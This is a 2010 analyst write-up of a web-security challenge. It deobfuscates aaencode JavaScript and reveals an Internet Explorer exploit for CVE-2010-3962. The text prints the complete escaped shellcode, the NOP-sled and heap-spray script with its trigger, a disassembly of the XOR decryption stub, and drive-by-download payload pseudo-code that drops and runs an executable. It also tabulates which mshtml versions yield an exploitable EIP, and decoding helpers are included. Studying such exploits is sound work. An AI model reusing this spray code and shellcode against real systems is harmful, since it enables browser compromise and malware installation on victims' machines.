Author: Tsukasa Ooi
Date: 2010/11/23-29
This type of JavaScript is very famous in Japan. That does not mean it is famous as a threat; rather, its author, Yosuke Hasegawa, is very famous in Japan. He transforms JavaScript into various interesting styles.
Obviously, this script was generated by his creation, aaencode. First, I will try to deobfuscate the script using its source code. aaencode's source code is embedded as JavaScript in the site above, so I (and you) can obtain it.
Now, I assume the target script was generated by aaencode, and I will write `aadecode', which decodes/deobfuscates scripts generated by aaencode. The important part is the `aaencode' function in the generator. The generated script is very simple: only a few characters are used for the encoding, apart from the header and footer. Here is the conversion table.
character | aaencode expression |
\ | (゚Д゚)[゚ε゚] |
u | (o゚ー゚o) |
0 | (c^_^o) |
1 | (゚Θ゚) |
2 | ((o^_^o) - (゚Θ゚)) |
3 | (o^_^o) |
4 | (゚ー゚) |
5 | ((゚ー゚) + (゚Θ゚)) |
6 | ((o^_^o) +(o^_^o)) |
7 | ((゚ー゚) + (o^_^o)) |
8 | ((゚ー゚) + (゚ー゚)) |
9 | ((゚ー゚) + (゚ー゚) + (゚Θ゚)) |
a | (゚Д゚) .゚ω゚ノ |
b | (゚Д゚) .゚Θ゚ノ |
c | (゚Д゚) ['c'] |
d | (゚Д゚) .゚ー゚ノ |
e | (゚Д゚) .゚Д゚ノ |
f | (゚Д゚) [゚Θ゚] |
Each character is escaped (in \ooo form or \uxxxx form) and transcoded. The obfuscated string is generated by simply concatenating the tokens for each character. The script is then executed using an eval technique.
aadecode recovers the original characters of the script using the table above and unescapes the result. Web-Challenge.html contains two obfuscated scripts, and aadecode can decode both without any errors.
The intermediate (escaped) result is shown below.
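The decoder described above, written out as an added example (this is not the author's aadecode nor Hasegawa's aaencode). It re-implements the per-character step from the table (octal for ASCII, `u` plus four hex digits otherwise), tokenizes an encoded body back to the escaped form, and resolves the escapes. It assumes the fixed aaencode header and footer have already been stripped from the body, and that the `゚`/`ー` characters in the table are the same code points as in the script being decoded.

```python
import re

# Conversion table copied from the writeup: the expression aaencode emits for each
# character of the escape sequence. Whitespace inside an expression is not significant.
AA_TABLE = {
    "\\": "(゚Д゚)[゚ε゚]",
    "u": "(o゚ー゚o)",
    "0": "(c^_^o)",
    "1": "(゚Θ゚)",
    "2": "((o^_^o) - (゚Θ゚))",
    "3": "(o^_^o)",
    "4": "(゚ー゚)",
    "5": "((゚ー゚) + (゚Θ゚))",
    "6": "((o^_^o) +(o^_^o))",
    "7": "((゚ー゚) + (o^_^o))",
    "8": "((゚ー゚) + (゚ー゚))",
    "9": "((゚ー゚) + (゚ー゚) + (゚Θ゚))",
    "a": "(゚Д゚) .゚ω゚ノ",
    "b": "(゚Д゚) .゚Θ゚ノ",
    "c": "(゚Д゚) ['c']",
    "d": "(゚Д゚) .゚ー゚ノ",
    "e": "(゚Д゚) .゚Д゚ノ",
    "f": "(゚Д゚) [゚Θ゚]",
}

# Longest expression first, so the token for '9' is tried before the one for '4'.
_TOKENS = sorted(((re.sub(r"\s+", "", expr), ch) for ch, expr in AA_TABLE.items()),
                 key=lambda pair: len(pair[0]), reverse=True)

_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})|\\([0-7]{1,3})")


def aaencode_body(text: str) -> str:
    """The per-character step the writeup describes (without aaencode's fixed header
    and footer): '\\' + octal code for ASCII, '\\u' + four hex digits otherwise,
    each escape character replaced by its table expression, joined with '+'."""
    parts = []
    for ch in text:
        n = ord(ch)
        esc = "\\" + (oct(n)[2:] if n <= 127 else "u" + format(n & 0xFFFF, "04x"))
        parts.extend(AA_TABLE[c] for c in esc)
    return "+".join(parts)


def aadecode_tokens(body: str) -> str:
    """Map the expression stream back to the escaped form, e.g. '\\141\\154...'.
    A '+' between expressions is only a separator; a '+' inside one (as in the
    token for '5') is consumed as part of the token by the greedy longest match."""
    s = re.sub(r"\s+", "", body)
    out, i = [], 0
    while i < len(s):
        if s[i] == "+":
            i += 1
            continue
        for expr, ch in _TOKENS:
            if s.startswith(expr, i):
                out.append(ch)
                i += len(expr)
                break
        else:
            raise ValueError(f"unknown aaencode token at offset {i}: {s[i:i + 24]!r}")
    return "".join(out)


def js_unescape(escaped: str) -> str:
    """Resolve \\ooo (legacy octal, 1-3 digits) and \\uXXXX escapes the way a JS
    string literal does when the generated code is eval'ed."""
    def repl(m):
        return chr(int(m.group(1), 16)) if m.group(1) else chr(int(m.group(2), 8))
    return _ESCAPE.sub(repl, escaped)


def aadecode(body: str) -> str:
    """Full decode: expression stream -> escaped string -> original script text."""
    return js_unescape(aadecode_tokens(body))


# Intermediate (escaped) result quoted in the writeup for the first script.
ESCAPED_FROM_WRITEUP = (r"\141\154\145\162\164\50\42\167\145\40\154\157\166\145\40"
                        r"\101\123\105\103\40\53\137\53\42\51")

if __name__ == "__main__":
    print(js_unescape(ESCAPED_FROM_WRITEUP))                # alert("we love ASEC +_+")
    print(aadecode(aaencode_body('alert("we love ASEC +_+")')))
```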
\141\154\145\162\164\50\42\167\145\40\154\157\166\145\40\101\123\105\103\40\53\137\53\42\51
And now the unescaped one.
alert("we love ASEC +_+")
rrrb= ("...");rrra=unescape(rrrb.replace(/wo0o/g,"%u")); var rrrabbb = 0x86000-(rrra.length*2);wwwwwwwwww=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090'); while(wwwwwwwwww.length<rrrabbb/2) { wwwwwwwwww+=wwwwwwwwww; } var bigblock = wwwwwwwwww.substring(0,rrrabbb/2); mem = new Array(); for(i=0; i<1500; i++) {mem[i] = bigblock + bigblock + rrra;} document.write("<table style=position:absolute;clip:rect(0)>");
The second script is presumably related to an IE vulnerability.
Incidentally, I found several base64 strings at the end of the html file. By decoding the base64 repeatedly, I found an interesting string in the middle.
Thx hasegawa!! do you know only base64? -_-
Unfortunately, I had already decoded the script before finding this base64 string.
The behaviour of this obfuscated script is very browser-specific.
browser | result |
Internet Explorer 6 | does not work |
Internet Explorer 7 | does not work |
Internet Explorer 8 | works! |
Google Chrome (4-7) | works! |
Mozilla Firefox (3.0, 3.5, 3.6) | works! |
Android 2.1 (WebKit 530.17) | works! |
iOS 4.1 (Safari/WebKit 532.9) | works! |
Opera (10, 10.50, 10.63) | works! |
Almost all recent, modern browsers can parse this obfuscated JavaScript and run it.
The notable thing is compatibility mode. The obfuscated script will not run in IE8 compatibility mode, but because of the meta tag below, IE8 recognizes this file in standards-compliant mode.
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
I will make the second script easier to read.
// Unescape the SHELLCODE
shellcode_esc = (
"wo0o10EBwo0o4B5Bwo0oC933wo0oB966wo0o0383wo0o3480wo0oD10Bwo0oFAE2" +
"wo0o05EBwo0oEBE8wo0oFFFFwo0o38FFwo0oD307wo0oD1D1wo0oB58Ewo0oE170" +
"wo0oD1D1wo0o5AD1wo0oDD91wo0oA15Awo0o7CCDwo0oB95Awo0o5AD9wo0oBB26" +
"wo0o88D4wo0o8C39wo0oD1D0wo0o33D1wo0o9128wo0oE951wo0oA412wo0o582B" +
"wo0oE597wo0oA3B9wo0oD1A5wo0oB9D1wo0oA2BCwo0oB2A7wo0o0D5Awo0oC13A" +
"wo0o2E82wo0oE5A7wo0o2E5Awo0o5A84wo0o5A3Dwo0o5CC7wo0oD483wo0o332E" +
"wo0o3A39wo0o2E2Ewo0o8B2Ewo0oBB8Bwo0o88D4wo0o5A84wo0o3939wo0oD0F3" +
"wo0oD1D1wo0o2833wo0oB98Cwo0oBFBEwo0oD1D1wo0oA4B9wo0oBDA3wo0o5ABC" +
"wo0o3A0Dwo0o82C1wo0oA72Ewo0o5AE5wo0o842Ewo0o3D5Awo0oC75Awo0o835C" +
"wo0o2ED4wo0o3933wo0o2E3Awo0o2E2Ewo0o8B8Bwo0o5A84wo0o3939wo0oD123" +
"wo0oD1D1wo0oB98Cwo0oE2BDwo0oD1E3wo0oA2B9wo0oB4B9wo0o5ABDwo0o3A0D" +
"wo0o82C1wo0oA72Ewo0o5AE5wo0o842Ewo0o3D5Awo0oC75Awo0o835Cwo0o2ED4" +
"wo0o3933wo0o2E3Awo0o2E2Ewo0o8B8Bwo0o5A84wo0o3939wo0oD115wo0oD1D1" +
"wo0o6E39wo0oD1D1wo0o8CD1wo0o3D50wo0oD0D1wo0oD1D1wo0o0D5Awo0oB982" +
"wo0oD0D1wo0oD1D1wo0o872Ewo0o58D5wo0oE98Fwo0oD516wo0oBDD2wo0oB6BE" +
"wo0o16FFwo0oD295wo0oB6D5wo0oB7B8wo0oE2D1wo0o8111wo0o8281wo0o075A" +
"wo0o1352wo0o83AAwo0o2E81wo0oF987wo0o3D50wo0oD0D1wo0oD1D1wo0o0D5A" +
"wo0o11E2wo0oBB81wo0o82CBwo0o2E81wo0oE187wo0o1A5Awo0o5190wo0oD1E8" +
"wo0o2BA4wo0oD016wo0oB08Dwo0oB6BDwo0o9016wo0oFFD5wo0oA9B4wo0o16B4" +
"wo0oD990wo0oD1D1wo0oD1D1wo0o8F58wo0o2EEDwo0oEDA7wo0oA72Ewo0o39E9" +
"wo0oD144wo0oD1D1wo0o11E2wo0oC53Awo0o2E81wo0oEDA7wo0oA72Ewo0o5AE5" +
"wo0o842Ewo0o3D5Awo0o875Awo0o5CD9wo0oD483wo0o332Ewo0o3639wo0o2E2E" +
"wo0oB92Ewo0oD239wo0oD1D1wo0o872Ewo0o2EC1wo0oE9A7wo0o872Ewo0o50DD" +
"wo0oD515wo0oD1D3wo0oE2D1wo0oBB18wo0o80D2wo0o175Awo0o1152wo0o81B3" +
"wo0o175Awo0o1152wo0o8181wo0o175Awo0o1152wo0o818Cwo0o2E80wo0oFD87" +
"wo0o2E80wo0oC587wo0o8780wo0oA45Awo0o5AEDwo0oFFA5wo0oD2A9wo0o8724" +
"wo0oA75Awo0oD2F1wo0oE224wo0o9818wo0o7C90wo0o14D2wo0o0AE2wo0o6FDE" +
"wo0oEBC1wo0oA507wo0o10D9wo0oDC1Awo0o0BD2wo0o3A91wo0oEA20wo0oA4CE" +
"wo0o8F36wo0o8F5Awo0oD2F5wo0oB70Cwo0oDD5Awo0o5A9Awo0oCD8Fwo0o0CD2" +
"wo0oD55Awo0oD25Awo0o7A14wo0o888Fwo0o8412wo0o3D5Awo0o3D52wo0o8385" +
"wo0o8280wo0o8687wo0oAC5Cwo0o687Dwo0oD1C4wo0oD1D1wo0o1D69wo0o1D1D" +
"wo0o221Dwo0o167Awo0o2D94wo0oD1D1wo0oD1D1wo0o175Awo0o1152wo0o8191" +
"wo0o945Awo0o81D9wo0o872Ewo0o52C9wo0oD915wo0o9458wo0o5229wo0o29AC" +
"wo0oA4D1wo0oE2D6wo0o3811wo0oD11Dwo0oD1D1wo0o1F5Awo0o1052wo0o8095" +
"wo0o9C5Awo0o80DDwo0o872Ewo0o52C9wo0oD915wo0o9458wo0o5225wo0o25AC" +
"wo0oA4D1wo0oE2D6wo0o3811wo0oD17Dwo0oD1D1wo0o9416wo0oD13Dwo0oD1D1" +
"wo0o5AD1wo0o2584wo0oBB83wo0oBBD0wo0o5AD7wo0o5207wo0o9913wo0o2E83" +
"wo0oF187wo0o1552wo0o69C1wo0oD1D0wo0oD1D1wo0o1154wo0oBEA5wo0o9C5A" +
"wo0o8029wo0oD0BBwo0oD0BBwo0o845Cwo0o8321wo0o872Ewo0o52CDwo0oC115" +
"wo0o9458wo0o522Dwo0o2DACwo0oA4D1wo0o3AD3wo0o5A83wo0o3D94wo0o1152" +
"wo0o58D0wo0o3D94wo0oAC52wo0oD73Dwo0oD3AEwo0o183Awo0o9C5Awo0o5021" +
"wo0o2E30wo0oD1D1wo0o54D1wo0oA518wo0o5AF1wo0o2184wo0o3350wo0oD12E" +
"wo0oD1D1wo0oEF68wo0oD1D1wo0o50D1wo0o2E30wo0oD1D1wo0oEAD1wo0oA500" +
"wo0o5BD9wo0o2194wo0oEFE5wo0o9459wo0o5A21wo0o259Cwo0oBB80wo0oBBD0" +
"wo0o5CD0wo0o2184wo0o2E83wo0oF187wo0o1552wo0o3AC1wo0o5A59wo0o2994" +
"wo0o2E81wo0oF587wo0o1552wo0o5AD5wo0o259Cwo0o2E80wo0oF587wo0o1552" +
"wo0o69D5wo0oD1D0wo0oD1D1wo0o8F8Ewo0o888Awo0o528Bwo0o8515wo0o345A" +
"wo0o128Cwo0oF439wo0o2E2Cwo0o5F2Ewo0oDF9Fwo0oE23Dwo0o5B1Bwo0o498A" +
"wo0o5B2Fwo0oF4DFwo0o2E61wo0o6113wo0oFC98wo0oA50Awo0o99CFwo0oBF1C" +
"wo0oFFADwo0o7530wo0oDFA8wo0o0936wo0o765Bwo0o8936wo0o4F9Dwo0oE70A" +
"wo0oFECBwo0o8FA1wo0o306Awo0oC3CAwo0o1AD3wo0oE0C4wo0oE2E3wo0oE4E5" +
"wo0oE6E7wo0oE8E9wo0oD1E1wo0oA3D1wo0oFAB3wo0oA6D1wo0oFAB3wo0o9CD1" +
"wo0o418Bwo0oD2D1wo0oD1D1wo0o98D1wo0o8994wo0o9D81wo0o839Ewo0oFF94" +
"wo0o8994wo0oD194wo0oA1BEwo0oBFB4wo0oB9D1wo0oA5A5wo0oEBA1wo0oFEFE" +
"wo0oA6A6wo0oFFA6wo0oB9B0wo0oBDBFwo0oB3B0wo0oB2FFwo0oBCBEwo0oBAD1" +
"wo0oA8B4wo0oEBF1wo0oB9F1wo0oBDB4wo0oBEBDwo0o90F1wo0o9482wo0o9192" +
"wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0" +
"wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0oD1F0"
);
shellcode = unescape(shellcode_esc.replace(/wo0o/g,"%u"));
// Make NOP-sled
var nopsled_len = 0x86000 - (shellcode.length * 2);
nopsled_short = unescape(
'%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090' +
'%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090' +
'%u9090%u9090%u9090%u9090%u9090%u9090%u9090');
while(nopsled_short.length < nopsled_len / 2)
{
nopsled_short += nopsled_short;
}
var nopsled = nopsled_short.substring(0, nopsled_len / 2);
// Heap Splay
mem = new Array();
for(i=0; i<1500; i++)
{
mem[i] = nopsled + nopsled + shellcode;
}
// Exploit it!
document.write("<table style=position:absolute;clip:rect(0)>");
It is very easy to understand. `unescape'ing the long string expands it into the shellcode. The script then concatenates the shellcode with a very, very long NOP-sled and performs a heap spray, and then exploits the browser. From this script, I can guess some interesting things.
I guess the shellcode runs after the NOP-sled, so I assume it is valid x86 code; now I decode and disassemble it.
; SHELLCODE header (disassembled by ndisasm 2.08)
; POC Hackers' Dream contest
; 1. jump near the payload
00000000 EB10 jmp short 0x12
; 3. ebx is now absolute address of payload
00000002 5B pop ebx
; 4. decrypt the payload (xor 0xd1)
; note that ebx is pre-decremented because
; loop instruction is executed when ecx != 0.
; if first `dec ebx' is missing, first byte of
; payload is not decrypted which causes crash.
00000003 4B dec ebx
00000004 33C9 xor ecx,ecx
00000006 66B98303 mov cx,0x383
0000000A 80340BD1 xor byte [ebx+ecx],0xd1
0000000E E2FA loop 0xa
; 5. run shellcode payload
00000010 EB05 jmp short 0x17
; 2. dummy call (to get current EIP)
00000012 E8EBFFFFFF call dword 0x2
00000017 (encrypted payload following)
It is obvious: the shellcode header XOR-decrypts its payload (with the byte key 0xd1) and then runs the decrypted payload.
By decrypting the payload the same way its header does, I found some interesting strings.
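An analyst's replay of that decryption, as an added example that is not part of the writeup. It converts the `wo0o`/%u form into the bytes that `unescape` plus the spray put in memory (one UTF-16 code unit per %u, little-endian), checks the stub against the disassembly above, reads the loop count and key out of it, and replays the loop. The stub bytes are the ones quoted on this page; the payload it decrypts is a constructed placeholder, not the contest payload.

```python
import re
import struct

# First 24 bytes of the escaped shellcode exactly as quoted in the writeup: the 23-byte
# XOR stub plus the first encrypted payload byte (0x38).
STUB_FROM_WRITEUP = (
    "wo0o10EBwo0o4B5Bwo0oC933wo0oB966wo0o0383wo0o3480wo0oD10Bwo0oFAE2"
    "wo0o05EBwo0oEBE8wo0oFFFFwo0o38FF"
)

PAYLOAD_OFFSET = 0x17          # target of the stub's final 'jmp short 0x17'
_UNIT = re.compile(r"%u([0-9A-Fa-f]{4})")


def js_unescape_to_bytes(esc: str) -> bytes:
    """Turn the 'wo0o'-disguised %uXXXX string into the bytes the spray puts in memory:
    unescape('%u10EB') is one UTF-16 code unit, stored little-endian, i.e. bytes EB 10."""
    esc = esc.replace("wo0o", "%u")                 # the same replace() the script does
    if _UNIT.sub("", esc):
        raise ValueError("only %uXXXX escapes are handled")
    return b"".join(struct.pack("<H", int(m.group(1), 16)) for m in _UNIT.finditer(esc))


def parse_xor_stub(sc: bytes):
    """Match the stub against the disassembly in the writeup and return (key, count):
    the imm8 of 'xor byte [ebx+ecx]' and the imm16 of 'mov cx'."""
    if len(sc) < PAYLOAD_OFFSET:
        raise ValueError("too short to hold the 23-byte stub")
    if sc[0:8] != b"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9":      # jmp; pop ebx; dec ebx; xor ecx,ecx; mov cx,
        raise ValueError("stub prologue does not match")
    count = struct.unpack_from("<H", sc, 8)[0]
    if sc[10:13] != b"\x80\x34\x0B":                          # xor byte [ebx+ecx], imm8
        raise ValueError("xor instruction does not match")
    key = sc[13]
    if sc[14:23] != b"\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF":  # loop; jmp 0x17; call 0x2
        raise ValueError("stub epilogue does not match")
    return key, count


def decrypt_payload(sc: bytes) -> bytes:
    """Replay the loop: after 'pop ebx; dec ebx', ebx = 0x16 and ecx counts count..1,
    so bytes 0x17 .. 0x16+count are XORed with the key. Byte 0x17 is covered only
    because of that pre-decrement, which is the point the writeup's comment makes."""
    key, count = parse_xor_stub(sc)
    if PAYLOAD_OFFSET + count > len(sc):
        raise ValueError(f"truncated: stub expects {count} payload bytes after 0x17")
    ebx = PAYLOAD_OFFSET - 1
    buf = bytearray(sc)
    for ecx in range(count, 0, -1):
        buf[ebx + ecx] ^= key
    return bytes(buf[PAYLOAD_OFFSET:PAYLOAD_OFFSET + count])


# Constructed sample (NOT the contest payload): the real stub bytes above with the loop
# count patched to fit a harmless made-up payload, XORed with the stub's own key.
SAMPLE_PLAINTEXT = b"key : CONSTRUCTED-SAMPLE-NOT-THE-REAL-KEY\x00"


def build_sample() -> str:
    stub = bytearray(js_unescape_to_bytes(STUB_FROM_WRITEUP)[:PAYLOAD_OFFSET])
    key, _ = parse_xor_stub(stub)
    body = SAMPLE_PLAINTEXT
    if (len(stub) + len(body)) % 2:
        body += b"\xCC"                              # every %u unit carries two bytes
    struct.pack_into("<H", stub, 8, len(body))       # mov cx, len(body)
    raw = bytes(stub) + bytes(b ^ key for b in body)
    return "".join("wo0o%02X%02X" % (raw[i + 1], raw[i]) for i in range(0, len(raw), 2))


if __name__ == "__main__":
    print(parse_xor_stub(js_unescape_to_bytes(STUB_FROM_WRITEUP)))   # (209, 899)
    print(decrypt_payload(js_unescape_to_bytes(build_sample())))
```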
I believe the string beginning with 'key : ' is the key.
At first, I thought this part of the string was just a placeholder and that the REAL key would appear after `running' the shellcode, but this part is not modified during shellcode execution.
FYI, here is pseudo-code of the shellcode's activity.
// CAUTION: This is a pseudo-code.
// The real shellcode is more complicated and `dangerous'.
HINSTANCE hInstance;
char file1[256];
char file2[256];
// load the address of various APIs
hInstance = /* known address of kernel32.dll */;
GetProcAddress(hInstance, "LoadLibraryA");
GetProcAddress(hInstance, "GetTempPathA");
GetProcAddress(hInstance, "WinExec");
GetProcAddress(hInstance, "DeleteFileA");
GetProcAddress(hInstance, "Sleep");
hInstance = LoadLibraryA("msvcrt");
GetProcAddress(hInstance, "exit");
GetProcAddress(hInstance, "fopen");
GetProcAddress(hInstance, "fread");
GetProcAddress(hInstance, "fwrite");
GetProcAddress(hInstance, "fclose");
hInstance = LoadLibraryA("urlmon");
GetProcAddress(hInstance, "URLDownloadToFileA");
hInstance = LoadLibraryA("shell32");
GetProcAddress(hInstance, "ShellExecuteA");
GetProcAddress(hInstance, "SHGetSpecialFolderPathA");
// drive-by-download!
GetTempPathA(256, file1);
strcat(file1, "log.gif");
/*** NOTE THAT URL HAS BEEN NEUTRALIZED. ***/
/*** SO DRIVE-BY-DOWNLOAD DOES NOT WORK. ***/
URLDownloadToFileA(NULL, " : hello ASEC@!@!@!@!@!@!@!@!@!@!@!@!@!", file1, 0, NULL);
SHGetSpecialFolderPathA(NULL, file2, CSIDL_APPDATA, FALSE);
strcat(file2, "\alg.exe");
MALICIOUS_GENERATE_CODE(file1, file2); // generate PE-file `file2'.
WinExec(SW_HIDE, file2);
Sleep(1000);
DeleteFileA(file1);
// show another webpage
ShellExecuteA("open", "IEXPLORE.EXE", "http://www.ahnlab.com", NULL, SW_SHOWMAXIMIZED);
// close current browser
exit( /* unpredictable value */ );
None of these activities modify the key string at all. So I believe this key string IS THE KEY.
This payload is somewhat OS-dependent, because part of the payload expects the DLL code to be laid out in a specific way. Here is part of the payload disassembly.
; 0. ebx = "msvcrt"
00000035 8BDC mov ebx,esp
; 1. jump
00000037 EB10 jmp short 0x49
; 3-1. push "msvcrt"
00000039 53 push ebx
; 3-2. push 'ret' instruction
0000003A FF7634 push dword [esi+0x34]
; 3-3. avoid breakpoints?
0000003D 8BFF mov edi,edi
0000003F 55 push ebp
00000040 8BEC mov ebp,esp
; 3-4. edx = &LoadLibraryA
00000042 8B16 mov edx,[esi]
; 3-5. edx = &LoadLibraryA + 5;
; we have to execute first 5-bytes of LoadLibraryA.
; assembly code below:
; - mov edi, edi
; - push ebp
; - mov ebp, esp
00000044 8D5205 lea edx,[edx+0x5]
; 3-6. call LoadLibraryA(+5)
00000047 FFE2 jmp edx
; 2. push return address
00000049 E8EBFFFFFF call dword 0x39
This executes from 5 bytes after the beginning of the LoadLibraryA function (probably to avoid breakpoints). For this to work, the first 5 bytes (3 instructions) of the function must have the form shown above, which is the Windows HotPatch-specific function prologue.
But the LoadLibraryA function of Windows XP SP0 and SP1 has a different prologue because it is not a HotPatch build, so the payload suffers a stack problem and simply crashes on these versions of the OS.
Windows XP SP2 is the first operating-system version with HotPatch images, so the target (client) OSes are Windows XP SP2 or later.
Moreover, this exploit does not work when DEP is on. This means the target OSes are very limited.
By googling, I found that this vulnerability is CVE-2010-3962. The site above says the shellcode is very IE-version-specific (more specifically, mshtml.dll-version-specific) and that the EIP value is not controllable by the exploit. I made my own payload and ran it on several combinations of IE and OS. Note that I tried the `decoded' shellcode, not the `aaencode'd one.
combination | DEP on IE | ASLR on IE | aaencode works | mshtml.dll base tested | decoded exploit/payload works |
XP x86 SP0 (en) / IE6 (mshtml: 6.0.2600.0) | none | none | no | 74810000 | no - payload incompatible (INEXPLOITABLE EIP: 0xB87493AD) |
XP x86 SP1 (en) / IE6 (mshtml: 6.0.2800.1106) | none | none | no | 74810000 | no - payload incompatible (INEXPLOITABLE EIP: 0x84748A62) |
XP x86 SP2 (en) / IE6 (mshtml: 6.0.2900.2180) | default no | none | no | 7D4A0000 | no (INEXPLOITABLE EIP: 0xCE7D4F7C) |
XP x86 SP2 (en) / IE6 (mshtml: 6.0.2900.3698) | default no | none | no | 7DC30000 | default yes (exploitable EIP: 0x5C7DC9D0) |
XP x86 SP3 (en) / IE6 (mshtml: 6.0.2900.5969) | default no | none | no | 7DC30000 | no (INEXPLOITABLE EIP: 0xDC7DC9D0) |
XP x86 SP3 (en) / IE6 (mshtml: 6.0.2900.6003) | default no | none | no | 7DC30000 | no (INEXPLOITABLE EIP: 0x837DC9D0) |
XP x86 SP3 (en) / IE6 (mshtml: 6.0.2900.6036) | default no | none | no | 7DC30000 | default yes (exploitable EIP: 0x0E7DC9CD) |
XP x86 SP2 (en) / IE7 (mshtml: 7.0.5730.13) | default no | none | no | 7E830000 | default yes (exploitable EIP: 0x597E85F9) |
XP x86 SP3 (en) / IE7 (mshtml: 7.0.5730.13) | default no | none | no | 7E830000 | default yes (exploitable EIP: 0x597E85F9) |
XP x86 SP3 (en) / IE7 (mshtml: 7.0.6000.17080) | default no | none | no | 3CEA0000 | default yes (exploitable EIP: 0x303CEEBB) |
XP x86 SP3 (en) / IE7 (mshtml: 7.0.6000.17092) | default no | none | no | 3CEA0000 | no (INEXPLOITABLE EIP: 0xF83CEEBB) |
XP x86 SP2 (en) / IE8 (mshtml: 8.0.6001.18702) | default no | none | yes | 63580000 | no - exploit incompatible (possibly exploitable EIP: 0x646367B2) |
XP x86 SP3 (en) / IE8 (mshtml: 8.0.6001.18702) | default yes | none | yes | 63580000 | no - exploit incompatible (possibly exploitable EIP: 0x646367B2) |
XP x86 SP3 (en) / IE8 (mshtml: 8.0.6001.18939) | default yes | none | yes | 3CEA0000 | no - exploit incompatible (possibly exploitable EIP: 0x1D3CF5BD) |
XP x86 SP3 (en) / IE8 (mshtml: 8.0.6001.18975) | default yes | none | yes | 3CEA0000 | no - exploit incompatible (possibly exploitable EIP: 0x4D3CF5BF) |
XP x64 SP1 (en) / IE6 (mshtml: 6.0.3790.2643 ; 32-bit) | default no | none | no | 4A500000 | no (INEXPLOITABLE EIP: 0x9B4A5B08) |
XP x64 SP2 (en) / IE6 (mshtml: 6.0.3790.3959 ; 32-bit) | default no | none | no | 02580000 | default yes (exploitable EIP: 0x5102A2B7) |
XP x64 SP2 (en) / IE6 (mshtml: 6.0.3790.4772 ; 32-bit) | default no | none | no | 02490000 | no (INEXPLOITABLE EIP: 0x910292B7) |
XP x64 SP2 (en) / IE7 (mshtml: 7.0.5730.13 ; 32-bit) | default no | none | no | 63580000 | default yes (exploitable EIP: 0x59635AF9) |
XP x64 SP2 (en) / IE7 (mshtml: 7.0.6000.17092 ; 32-bit) | default no | none | no | 3F9A0000 | no (INEXPLOITABLE EIP: 0xF83F9EBB) |
XP x64 SP2 (en) / IE8 (mshtml: 8.0.6001.18702 ; 32-bit) | default no | none | yes | 63580000 | no - exploit incompatible (possibly exploitable EIP: 0x646367B2) |
XP x64 SP2 (en) / IE8 (mshtml: 8.0.6001.18975 ; 32-bit) | default no | none | yes | 3F9A0000 | no - exploit incompatible (possibly exploitable EIP: 0x4D3FA5BF) |
Svr2k3 x86 SP0 (en) / IE6 (mshtml: 6.0.3790.0) | none | none | no | 745E0000 | no - payload incompatible (INEXPLOITABLE EIP: 0xAD745E3F) |
Svr2k3 x86 SP0 (en) / IE6 (mshtml: 6.0.3790.630) | none | none | no | 77380000 | no - payload incompatible (exploitable EIP: 0x117745FE) |
Svr2k3 x86 SP1 (en) / IE6 (mshtml: 6.0.3790.1830) | default yes | none | no | 7D0E0000 | no (INEXPLOITABLE EIP: 0xA17D1900) |
Svr2k3 x86 SP1 (en) / IE6 (mshtml: 6.0.3790.3304) | default yes | none | no | 4A500000 | default no - blocked by DEP (exploitable EIP: 0x324A5B06) |
Svr2k3 x86 SP2 (en) / IE6 (mshtml: 6.0.3790.4470) | default yes | none | no | 7F9E0000 | no (INEXPLOITABLE EIP: 0xB17FABB7) |
Svr2k3 x64 SP1 (en) / IE6 (mshtml: 6.0.3790.1830 ; 32-bit) | default yes | none | no | 7D0E0000 | no (INEXPLOITABLE EIP: 0xA17D1900) |
Svr2k3 x64 SP1 (en) / IE6 (mshtml: 6.0.3790.3304 ; 32-bit) | default yes | none | no | 4A500000 | default no - blocked by DEP (exploitable EIP: 0x324A5B06) |
Vista x86 SP0 (en) / IE7 (mshtml: 7.0.6000.16386) | default yes* | default yes | no | 6D440000 | no (INEXPLOITABLE EIP: 0xE36D48B9) |
Vista x86 SP1 (en) / IE7 (mshtml: 7.0.6001.18000) | default yes* | default yes | no | 6BB60000 | default no (exploitable EIP: 0x596BC2FE / can vary) |
The target script won't run on IE8 because the heap-spray code is WRONG for this version of the browser. The target script uses /* deobfuscated form */ mem[i] = nopsled + nopsled + shellcode; for the heap spray, but in IE8 this concatenation is translated into a pointer copy (not a content copy!). So the target script no longer heap-sprays in IE8.
This is amazing! None of the browsers can actually run the exploit in Web-Challenge.html without decoding it! How safe it is!
To make the shellcode run, one has to use the `substring' (or substr) method to force IE8 to perform a content copy (not a pointer copy). Even then, the exploit can fail because the heap spray fails; I did not care whether the heap spray fails.
The second notable thing is that the address is indeed mshtml.dll-dependent, but it can also vary between platforms. Look at IE7 with mshtml version 7.0.5730.13: it has the same exploit EIP (0x597E85F9) on the x86 editions, but the x64 edition has a different exploit EIP (0x59635AF9). This is because the loaded base address of mshtml.dll differs (even though exactly the same binary is loaded, the exploit EIP differs).
Others...